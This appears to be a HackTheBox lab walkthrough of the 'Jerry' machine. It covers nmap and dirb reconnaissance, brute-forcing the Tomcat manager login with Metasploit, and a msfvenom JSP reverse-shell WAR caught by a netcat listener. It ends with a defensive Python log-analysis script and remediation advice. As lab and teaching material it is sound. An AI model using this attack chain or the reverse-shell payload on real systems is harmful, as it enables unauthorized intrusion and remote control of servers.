HTB JERRY Walkthrough

HackTheBox Jerry Walkthrough


Start by finding our own IP (after connecting to the HTB OpenVPN).
Command to know our IP - ifconfig



Now let's see the IP of the machine we are targeting (just click the name of the machine in HTB). I am targeting the machine named JERRY, IP 10.10.10.95.


Scanning Phase
nmap -A 10.10.10.95 -Pn
-A - denotes aggressive scan
-Pn - skips the ping (host discovery) step and treats the host as up
Nmap revealed an HTTP service active on port 8080 and also revealed Tomcat.

So I browsed to the IP in the web browser to see the web page (because the HTTP service is active).
URL - 10.10.10.95:8080
(The port has to be given because HTTP runs on port 80 by default, but in this case it is on 8080.)

Next, I fired up dirb to find directories, if any.
Command : dirb http://10.10.10.95:8080
Results are shown below


I opened the links one by one but found nothing, until at last I opened http://10.10.10.95:8080/manager
It prompted me with the Tomcat login panel (Tomcat was already mentioned in the nmap scan).


Click Cancel and you'll be redirected to a page with an HTML file where you will get the username and password.


The other way is to brute-force the panel with the Tomcat auxiliary module.
I fired up msfconsole and searched for the Tomcat auxiliary modules.
Command - search tomcat


I selected the Tomcat Application Manager Login Utility (see the description of every result).
Command - use auxiliary/scanner/http/tomcat_mgr_login
Then I checked the options required to run the scanner, i.e. rhosts.


I fulfilled the requirements of the scanner.
Command - set rhosts 10.10.10.95
rhosts - victim IP
Finally, I ran the scanner to start the brute-force.
It found the username tomcat and the password s3cret.


Finally, I logged in with the credentials.


On scrolling down I found the option to deploy a WAR file, so I can make a WAR payload and deploy it for a reverse connection.


Payload generation with msfvenom
Command - msfvenom -p java/jsp_shell_reverse_tcp lhost=10.10.15.2 lport=1337 -f war > /root/Desktop/reverse.war


Uploaded the payload named reverse


I started netcat (the Swiss army knife) to listen on port 1337,
then clicked on the deployed payload, i.e. reverse, and got the reverse connection
(a shell on the machine).


I explored the directories further for flags and got two flags.
Command - cd \Users\Administrator\Desktop\flags


I used the more command to read the flags.
Command - more "filename", then submit the obtained flags in HTB.
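
From the defender's side, the steps above (repeated failed logins on /manager/html, then a successful login and a WAR upload) leave a trail in Tomcat's access log. The script below is an added example, not part of the original walkthrough: it scans log lines in Tomcat's default access-log pattern and reports that sequence per client IP. The sample log lines, the analyze function and its threshold are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in Tomcat's default access-log pattern (%h %l %u %t "%r" %s %b).
# 10.10.15.2 is the lhost from the walkthrough; 192.0.2.20 and all timestamps are made up.
SAMPLE_LOG = """\
10.10.15.2 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.15.2 - - [01/Jan/2024:10:00:01 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.15.2 - - [01/Jan/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 401 2536
10.10.15.2 - tomcat [01/Jan/2024:10:00:02 +0000] "GET /manager/html HTTP/1.1" 200 17431
10.10.15.2 - tomcat [01/Jan/2024:10:03:10 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC HTTP/1.1" 200 19012
10.10.15.2 - - [01/Jan/2024:10:03:40 +0000] "GET /reverse/ HTTP/1.1" 200 0
192.0.2.20 - admin [01/Jan/2024:11:00:00 +0000] "GET /manager/html HTTP/1.1" 200 17431
"""

LINE = re.compile(r'(?P<ip>\S+) \S+ (?P<user>\S+) \[[^\]]+\] '
                  r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+')
# Manager endpoints that deploy a WAR (HTML form upload and the text interface).
DEPLOY_PATHS = {"/manager/html/upload", "/manager/text/deploy"}


def analyze(log_text, fail_threshold=3):
    """Return {client_ip: [findings]} for suspicious Tomcat manager activity."""
    fails = defaultdict(int)      # consecutive 401s on /manager/ per client
    findings = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m or not m["path"].startswith("/manager/"):
            continue
        ip, user, path = m["ip"], m["user"], m["path"].split("?")[0]
        if m["status"] == "401":
            fails[ip] += 1
        elif m["status"] == "200" and user != "-":
            # A success right after a run of failures suggests password guessing.
            if fails[ip] >= fail_threshold:
                findings[ip].append(f"login as {user} after {fails[ip]} failures")
            fails[ip] = 0
            # Every deployment is reported; routine ones should match a change record.
            if m["method"] in ("POST", "PUT") and path in DEPLOY_PATHS:
                findings[ip].append(f"WAR upload by {user}")
    return dict(findings)


if __name__ == "__main__":
    for ip, items in analyze(SAMPLE_LOG).items():
        print(ip, "->", "; ".join(items))
```

The root cause on this box is a known default credential on the manager application, so the lasting fix is to change or remove that account in tomcat-users.xml and restrict who can reach /manager at all.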
